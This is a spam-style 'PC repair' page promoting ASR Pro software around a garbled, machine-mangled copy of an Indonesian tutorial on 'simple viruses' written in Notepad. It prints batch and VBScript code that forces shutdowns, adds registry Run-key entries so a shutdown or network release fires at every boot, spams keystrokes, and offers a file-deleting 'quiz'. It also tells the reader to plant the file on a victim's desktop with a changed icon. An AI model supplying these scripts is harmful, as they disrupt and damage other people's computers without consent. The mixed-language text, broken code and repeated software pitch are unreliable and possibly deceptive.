You are currently viewing Solution For Membuat Spyware Dengan Notepad

Solution For Membuat Spyware Dengan Notepad

If you are getting Membuat Spyware Dengan notepad error, today’s article is here to help you.

Quick and Easy PC Repair

  • 1. Download and install ASR Pro
  • 2. Open the program and click "Scan"
  • 3. Click "Repair" to start the repair process
  • Enjoy a faster

    Siapa sih yang tidak takut dengan seed computer infection? computer virus terkena, maka besar kemungkinan computer kamu jadi tidak bisa digunakan. Apalagi jika komputer kamu kena salah satu dari 20 viruses komputer paling berbahaya dunia di.Tamat sudah, antara harus beli komputer baru atau install ulang.

    Di balik seramnya serangan virus computer, maka berikan jalantikus kamu kumpulan script hacker buat membuat virus computer sederhana. Mau Biar Nggak? kelihatan pintar kayak nullr profesional gitu.simak 7 script cough membuat virus sederhana dengan notepad.

    7 Membuat Virus Sederhana Hack Script

    Sudah tahu virus komputer itu berbahaya, kok JalanTikus bagikan cara membuat virusnya sih? Ya karena virus computer yang JalanTikus bagikan ini kuma berisi piece of software sederhana yang akan mengacaukan fungsi tanpa komputer merusak equipment atau membokorkan informasi yang American Dental Association di dalamnya. Jadi Aman David Kokok Untuk digunakan computer menjahili teman kamu.

    1. Membuat Stop

    Virus virus kerja bug komputer sederhana ini adalah dengan memaksa komputer teman atau target jadi Shutdown. Untuk melakukannya, silakan buka Notepad, serta copy paste code bawah di. Lalu save file-nya nama dengan ForceShutdown.bat type certificate file-nya File all.

    @Echo offmessage 7 . I do not like youshutdown -c "Error! The computer has shut down!" -WITH

    Quick and Easy PC Repair

    Is your computer running a little slower than it used to? Maybe you've been getting more and more pop-ups, or your Internet connection seems a bit spotty. Don't worry, there's a solution! ASR Pro is the revolutionary new software that helps you fix all of those pesky Windows problems with just the click of a button. With ASR Pro, your computer will be running like new in no time!

  • 1. Download and install ASR Pro
  • 2. Open the program and click "Scan"
  • 3. Click "Repair" to start the repair process

  • Untuk mengaktifkan virus ini, kamu harus klik only two files kali pada-nya. Maca, Otomatis secara virusini akan berjalan.

    2. Paksa Setiap Kali Dengan Dinyalakan Stop

    berbeda sebelumnya antivirus, sederhana virus yang ini akan memaksa komputer teman kamu untuk shutdown setiap kali dinyalakan. Ayts, jangan asal gunakan virus ini kalo siap gak tanggung akibatnya ya!

    echo @echo off>c:windowshartlell.batecho-dump>>c:windowshartlell.batecho -r shutdown -t 88 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI Reg_sz /t /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz C:windowshartlell /d.bat /fecho You've been hacked.PAUSE

    Simpan reports buatan kamu atas di dengan nama hampi semua. Jangan lupa ekstensi gunakan .beat you! Click “Untuk Less Active”.

    3. Mematikan Internet Secara Permanent

    Saat berada di suatu online, jaringan pasti kesal dong jika American Dental Assoc. Download Orang Yang Malach? Bikin im Internet lemot karena bandwith berkurang cepat. Makanya, coba Internet matikan teman kamu menggunakan sederhana berikut, virus scenario:

    echo @echo off>c:windowswimn32.batecho-blast>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg import hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI Reg_sz /t /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t /d reg_sz c:windowswimn32.bat /fecho You've been hacked!PAUSE

    Sepertibias, simpandengan nama hampir semua gunakan dan ekstensi.bat. Lalu klik untuk mengaktifkannya!

    4. Caps Lock

    Siapa yang tidak kesal jika American Dental Association or ngetik isinya huruf besar semua? Orang Yang minerima pesan dengan huruf besar semua jelas akan terganggu, merasa atau bahkan marah. Makanya, yuk isengin teman kamu dengan membuat Caps tombol Lock-nya nyala terus menggunakan virus script sederhana berikut:

    Copy and paste the code from the files into notepad, just leave it with the command ForceCapsLock.vbs and the file type nya All File. Press 2 kali buat mulai mengaktifkan sederhana computer virus ini.

    5. VirusAlai

    Siapa does cuma anak muda kekinian doang yang bisa alay? Computer kamu juga bisa alay loh kalo pathogen terinspeksi keyboard alay. No, Buat Membuat Virus Computer Jan Akan Membuat PC Keyboard Jadi Alai, Kamu Bisa Gunakan Software Sama, Bericut:

    Copy Caranya and the substance code into notepad. Save the file as ForceAlay.vbs and write down the entire file.

    6. Orang Jelek Virus

    membuat spyware dengan notepad

    Dikatain itu jelek emang nyebelin. Kalo kuma sekali dua kali sih harushna masih bisa ditahan, tapi kalo terus-terusan ngatai gimana jelek koba? No, dengan kode di bawah ini, kamu bisa membuat sebuah antivirus computer sederhana yang akan memaksa komputer target untuk mengeluarkan wary bahwa ‘dia jelek’ tanpa heti.

    Set wshShell meaningwscript.CreateObject("WScript.Shell")Dowscript.sleep 100wshshell.sendkeys "Muka Lu Jelek Kayak Lou's Computer"ribbon

    Copy and paste script sederhana di ke atas Notepad. Oh ia, kamu bisa bagian ganti varna merah dengan kata-kata sesuay selera, lalu dengan nama store VirusOrangJelek.vbs.

    7. Quiz Virus

    Semua orang suka kuis kalo apalagi Berhadiah. Tapi kamu bakal kesal deh pasti setiap kalo kali mau buka komputer, ternyata yang nongol adalah kuis. Yes I can? Buat kamu yang mau isengin target computer dengan kuis-kuis menyebalkan, coba kamu gunakan script berikut:

    @Echo offThe name is Kuis hari ini!:MenuclassifyEcho Jika kamu kena hsv apa yang kamu pilih lakukan?BreakEcho of Yang Mang:echo 1. Morning computerEcho 2. aja formatEcho 3. NangisEcho 4. Beli Computer BarEnter = don't install anythingset /p input=select:if %input%==1 -h stop -tthirtyif %input%==2 delete c:xxxif %input%==3 @ECHO is disabledmsg * Camu jelly flourmessage * Ngacha dulu gih!msg * Hayo reads, CPU reads gw acak-acak ya4. Ouda posts, install oolang ajamsg mau kelar kan [email protected] off:aboveSTART %SystemRoot%system32notepad.exeGet up

    Copy and paste the notebook with ViruzQuiz nama.bat. Selesai, tinggal jalankan buat mengujinya.

    Agar berjalan lancar, coba simpan file virus komputer sederhana yang kamu buat komputer di target. Lalu letakkan report tersebut di desktop, john jangan lupa ubah icon